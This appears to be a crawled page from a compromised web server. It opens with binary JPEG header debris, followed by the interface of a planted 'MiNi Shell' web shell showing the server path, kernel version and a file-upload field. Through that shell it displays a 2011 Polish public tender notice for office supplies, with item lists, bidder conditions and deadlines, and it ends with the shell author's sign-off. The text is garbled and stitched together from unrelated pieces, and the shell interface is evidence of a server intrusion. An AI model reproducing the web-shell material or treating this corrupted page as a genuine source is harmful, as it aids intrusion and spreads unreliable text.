JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110201/15888-N-2011.html

<p class="kh_header"><b>Szczecinek: DOSTAWA MATERIAŁÓW BIUROWYCH</b><br>
<b>Numer ogłoszenia: 15888 - 2011; data zamieszczenia: 01.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Lasów Państwowych w Szczecinku , ul. Mickiewicza 2, 78-400 Szczecinek, woj. zachodniopomorskie, tel. 094 3726300, faks 094 3726301.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW BIUROWYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień:  22800000-8 - Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmiennicze z papieru lub tektury
Lp.	Materiały biurowe 	Jedn. miary	Ilość
	- zestawienie rzeczowe, opis materiału		
1	Blok z makulatury w kratkę: grzbiet klejony, format A-4_100	szt.	200
2	Blok z makulatury w kratkę: grzbiet klejony, format A-5_100	szt.	200
3	Papier ksero POL JET 80g_m2 opak. w karton zielony, białość 5 gwiazdek 1 ryza 500 szt.	ryz	1000
4	Zeszyt 16 kart kratka	szt.	10
5	Zeszyt 32 kart kratka	szt.	50
6	Zeszyt 60 kart kratka	szt.	50
7	Zeszyt 96 kart kratka A4 twarda oprawa	szt.	100
8	Zeszyt 96 kart kratka A5 twarda oprawa	szt.	100
9	Zeszyt A-4 kratka _książka kancelaryjna - twarda oprawa bordowa	szt.	10
10	Zeszyt A-4 kratka _książka kancelaryjna - twarda oprawa zielona	szt.	10
11	Notes samoprzylepny  38 mm x 51 mm	szt.	50
12	Notes samoprzylepny 51 mm x 76mm	szt.	50
13	Notes samoprzylepny  76 mm x 76 mm	szt.	50
14	Notes samoprzylepny  76 mm x 102 mm	szt.	50
15	Notes samoprzylepny 76 mm x 127 mm	szt.	20
16	 Notes - kostka biała klejona 83x83x50 mm	szt	20
17	Segregator w formacie A-4 z mechanizmem dźwigowym, szerokość grzbietu 75 mm, wykonany z grubego kartonu, zewnętrzna okleina wykonana z zielonego PCV, wzmocniony otwór na palec oraz krawędzie, na grzbiecie wymienna etykieta opisowa	szt.	200
18	Segregator w formacie A-4 z mechanizmem dźwigowym, szerokość grzbietu 50 mm, wykonany z grubego kartonu, zewnętrzna okleina wykonana z zielonego PCV, wzmocniony otwór na palec oraz krawędzie, na grzbiecie wymienna etykieta opisowa	szt.	200
19	Segregator w formacie A-5 z mechanizmem dźwigowym, szerokość grzbietu 75 mm, wykonany z grubego kartonu, zewnętrzna okleina wykonana z kolorowego PCV, wzmocniony otwór na palec oraz krawędzie, na grzbiecie wymienna etykieta opisowa	szt.	50
20	Skoroszyt papierowy w formacie A-4 z metalowymi wąsami do wpinania dokumentów, wykonany z mocnego kartonu, kolor biały z nadrukiem i miejscem do opisu	szt.	200
21	Skoroszyt plastikowy, w formacie A-4, pasujący do każdego rodzaju segregatora, z bezbarwną przednią okładką, tylną kolorową, wykonany z twardego PCV z metalowymi wąsami do wpinania dokumentów, wysuwany papierowy pasek opisowy 	szt.	200
22	Teczka biurowa wiązana, wykonana z białego kartonu, posiadająca zakładki boczne, zabezpieczające dokumenty przed wypadaniem 	            szt.	300
23	Teczka biurowa z gumką, wykonana z kolorowego kartonu, posiadająca zakładki boczne, zabezpieczające dokumenty przed wypadaniem 	szt.	300
24	Teczka zawieszka A4 kartonowa 1_1	                         szt.	200
25	Teczka zawieszka A4 kartonowa 1_2	                         szt.	200
26	Teczka plastikowa wiązana, A4 wykonana z folii PCV, przednia okładka przeźroczysta, tylna kolorowa 	                                                 szt.	200
27	Cienkopis Pelikan - Soft Gel	szt	200
28	Cienkopis STABILO point 88 fine 0,4 niebieski	szt.	200
29	Cienkopis STABILO point 88 fine 0,4 czarny	            szt.	200
30	Cienkopis STABILO point 88 fine 0,4 zielony	szt.	200
31	Cienkopis STABILO point 88 fine 0,4 czerwony	szt.	200
32	Długopis żelowy typu (Pentel), w prostej, przeźroczystej obudowie, linia pisania o grubości 0,3 mm i długości 600 m, w kolorach: niebieski, 	szt.	100
33	Długopis żelowy typu (Pentel), w prostej, przeźroczystej obudowie, linia pisania o grubości 0,3 mm i długości 600 m, w kolorach: czarny, 	szt.	100
34	Wkład do długopisu żelowego typu (Pentel), określonego w pozycji 63, linia pisania o grubości 0,3 mm i długości 600 m, tusz o wyrazistym, intensywnym kolorze, w kolorach: niebieski,	                                                                         szt.	200
35	Wkład do długopisu żelowego typu (Pentel), określonego w pozycji 63, linia pisania o grubości 0,3 mm i długości 600 m, tusz o wyrazistym, intensywnym kolorze, w kolorach: czarny,	                                                                                     szt.	200
36	Zszywacz biurowy,  metalowy, zszywający do 20 kartek zszywkami 24/6 lub 26/6, możliwość zaginania zszywek do wewnątrz lub na zewnątrz	szt.	10
37	Zszywki  Tethis 24/6 lub 26/6	                                    op.	100
38	Dziurkacz biurowy; metalowa podstawa, ramię z tworzywa sztucznego, ogranicznik formatu, dziurkujący do 25 kartek	                                    szt.	10
39	Klej do papieru w sztyfcie, bezbarwny, bezwonny, posiadający atest PZH oraz 2-letnią gwarancję przydatności do użycia - opakowanie ok. 20-25 g, okres trwałości min. 1 rok	                                                                          szt.	100
40	Korektor szybko schnący Tipp-Ex 20 ml	szt.	20
41	Korektor szybko schnący w kształcie pióra, z cienką metalową końcówką, do korygowania drobnych elementów, niegęstniejący, zabezpieczony w nasadkę zabezpieczającą przed wysychaniem, precyzyjne dozujący do ostatniej kropli, wygodna, miękka oprawa.	                                                 szt.	100
42	Klipy biurowe do spinania papieru 25 mm	op.	20
43	Klipy biurowe do spinania papieru 32 mm	op.	20
44	Linijka przeźroczysta, plastikowa, z wyraźną podziałką, długość 20 cm.	szt.	50
45	Linijka przeźroczysta, plastikowa, z wyraźną podziałką, długość 30cm.	szt.	50
46	Nożyczki biurowe 	szt.	20
47	Nóż do papieru	szt.	20
48	Mazak typu PENTEL, czarny do opisywania płyt DVD-R	szt.	70
49	Marker niebieski z tuszem olejowym typu (Paint), wodoodporny, odporny na ścieranie, działanie światła i warunków atmosferycznych, do znakowania powierzchni szorstkich i gładkich, końcówka okrągła, grubość linii 2,2 - 2,8 mm	szt.	10
50	Marker czerwony z tuszem olejowym typu (Paint), wodoodporny, odporny na ścieranie, działanie światła i warunków atmosferycznych, do znakowania powierzchni szorstkich i gładkich, końcówka okrągła, grubość linii 2,2 - 2,8 mm	szt.	10
51	Marker czarny z tuszem olejowym typu (Paint), wodoodporny, odporny na ścieranie, działanie światła i warunków atmosferycznych, do znakowania powierzchni szorstkich i gładkich, końcówka okrągła, grubość linii 2,2 - 2,8 mm	szt.	10
52	Ołówek twardy, grafitowy (o symbolu HB), łatwy do temperowania, z niełamiącym się rysikiem, klejony na całej długości, odporny na złamania, z mocnego cedrowego drewna.	szt.	100
53	Papier pakowy	                        kg	10
54	Spinacze biurowe  28 mm	op.	200
55	Spinacze biurowe  33 mm	op.	200
56	Spinacze biurowe  50 mm	op.	100
57	Taśma klejąca bezbarwna (20)	szt.	200
58	Taśma klejąca brązowa (50)	            szt.	150
59	Grzbiet do bindowania  5  opak.100 szt	op.	2
60	Grzbiet do bindowania  10  opak. 100 szt	op.	2
61	Grzbiet do bindowania  12,5 opak.100 szt	op.	2
62	Okładka do bindowania, format A-4 - wykonana z twardej, wysokoprzeźroczystej folii PCV, a 100 sztuk	                                                 op.	5
63	Okładka do bindowania kartonowa, format A-4, nabłyszczana warstwa wierzchnia, a 100 sztuk	                                                              op.	5
64	Koszulka na dokumenty, format A-4, wykonana z przeźroczystej folii PCV, a 100	op.	20
65	Koszulka na dokumenty twarda z zakładką, format A-4 z przeźroczystej folii PCV, a 10	op.	200
66	Koszulka na dokumenty, format A-5, wykonana z przeźroczystej folii PCV, a 100	op.	5
67	Zakładki samoprzylepne 4x20x50  Memo office	op. 	20
68	Zakreślacz    z fluorescencyjnym tuszem na bazie wody, szerokość linii do-5mm, ścięta końcówka kolor  zielony	szt.	40
69	Zakreślacz z fluorescencyjnym tuszem na bazie wody, szerokość linii do-5mm, ścięta końcówka kolor  żółty	                        szt.	40
70	Zakreślacz  z fluorescencyjnym tuszem na bazie wody, szerokość linii do-5mm, ścięta końcówka kolor  różowy	szt.	40
71	Zakreślacz   z fluorescencyjnym tuszem na bazie wody, szerokość linii do-5mm, ścięta końcówka kolor  niebieski	szt.	40
72	Długopis (ZENIT)	            szt.	100
73	Wkłady do (ZENITA) - tusz niebieski	szt.	100
74	Wkłady do (ZENITA) - tusz czarny	            szt.	100
75	Półka na dokumenty bezbarwna, format A-4, wykonana z wytrzymałego plastiku	szt.	10
76	Płyty CD-R 700 MB, w białej kopercie z przeźroczystym okienkiem	szt.	50
77	Płyty DVD+R 4,7 GB, w białej kopercie z przeźroczystym okienkiem	szt.	50
78	Płyty DVD na szpindlu  po 100 szt	szt.	5
79	Koperty z przeżroczystym  okienkiem ( z przeznaczeniem dla płyt CD)szt	500
80	Tonery kolor do drukarki OKI MC 560	szt	9
81	Toner czarny do drukarki OKI MC 560	szt	3
82	Tonery kolor do drukarki OKI C5900 MFP	szt	9
83	Toner czarny do drukarki OKI C5900 MFP	szt	3
84	Tonery kolor do drukarki OKI C5950	szt	9
85	Toner czarny do drukarki OKI 5950	szt	3
86	Tonery kolor do drukarki OKI  C5750	szt	9
87	Toner czarny do drukarki OKI C5750	szt	3
88	Tonery kolor do drukarki OKI C3520 MFP	szt	9
89	Toner czarny do drukarki OKI C3520 MFP	szt	3
90	Toner czarny do drukarki OKI  B 6250	szt	3
91	Tonery kolor do drukarki OKI C3530	szt	9
92	Toner czarny do drukarki OKI C3530	szt	3
93	Tonery kolor do drukarki OKI C5550 MFP	szt	9
94	Toner czarny do drukarki OKI C5550 MFP	szt	3
95	Tonery do urządzenia wielofunkcyjnego CANON PIXMA MP- 550	kpl	3
96	Tonery do drukarki HP INKS VIVERA PSC 1500	kpl	3
97	Tonery do drukarki HP LEXMARK X340A11G	kpl	3
98	Tonery do drukarki HP BIZNES INK JET 1100	kpl	4
99	Tonery do drukarki HP DESK JET 970 Cxi	kpl	4
100	Tonery do drukarki HP OFFICE JET PRO K550	kpl	4
101	Tonery do drukarki HP LASER JET 4L ( 74A)	kpl	3
102	Tonery do drukarki HP LASER JET 1320 (49A)	kpl	3
103	Tonery do drukarki HP LASER JET 1300 (13A)	kpl	3
Zamawiający nie dopuszcza składania ofert wariantowych. 
Zamawiający dopuszcza składanie ofert równoważnych.

3.2	Szczegółowy opis wymagań dla zamawianego asortymentu:
3.2.1	Wymaga się, aby przedmiot dostawy był produkowany jako fabrycznie nowy, wolny od wad technicznych i prawnych, dopuszczony do obrotu oraz dobrej jakości. Okres ważności wszystkich dostarczanych artykułów powinien wynosić minimum 12 miesięcy od dnia dostawy.
3.2.2	Nie dopuszcza się wskazania w ofercie regenerowanych wkładów drukujących, lub z pominięciem procesu produkcyjnego. Oferent winien posiadać prawo przedstawienia w ofercie asortymentu równoważnego, tzn. innego niż podany w kolumnie (materiały biurowe) a wym. w pkt. 3.1, pod warunkiem, że posiada on takie same lub lepsze parametry techniczne, jakościowe, funkcjonalne oraz użytkowe, jak produkt oryginalny. Przez produkty równoważne rozumie się zamienniki charakteryzujące się pełną kompatybilnością z urządzeniami, w których mają być użytkowane jako materiały eksploatacyjne, a także posiadające nie gorsze niż produkt oryginalny parametry w zakresie jakości wydruku i wydajności.
3.2.3	Wszystkie artykuły wyżej wymienione, powinny odpowiadać wymaganiom tam określonym i posiadać cechy pierwotnego opakowania. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 Pzp). Zamawiający może zażądać próbek w celu oceny jakości przedstawionych produktów (§ 5 ust. 1 pkt. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane - Dz.U.2009, Nr 226, poz. 1887).
3.3	Zamawiający nie dopuszcza składania ofert częściowych. Oferty niezawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone.
3.4	Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.19.00.00-7, 30.19.76.00-2, 30.19.76.30-1, 30.19.21.13-6, 30.23.72.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1000,00 zł (słownie: jeden tysiąć 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. Wykonawca wykaże minimum dwie (2) zrealizowane dostawy, z których każda będzie na kwotę minimum 50 tys. zł. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia. 
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Zamawiający wymaga, aby wykonawca w chwili składania oferty posiadał ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - przy czym suma ubezpieczenia nie może być niższa od kwoty min. 70 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_szczecinek/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy w siedzibie Zamawiajacego pokój nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2011 godzina 10:00, miejsce: W siedzibie Zamawiającego pokój nr Kancelaria ogólna biura - budynek C.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com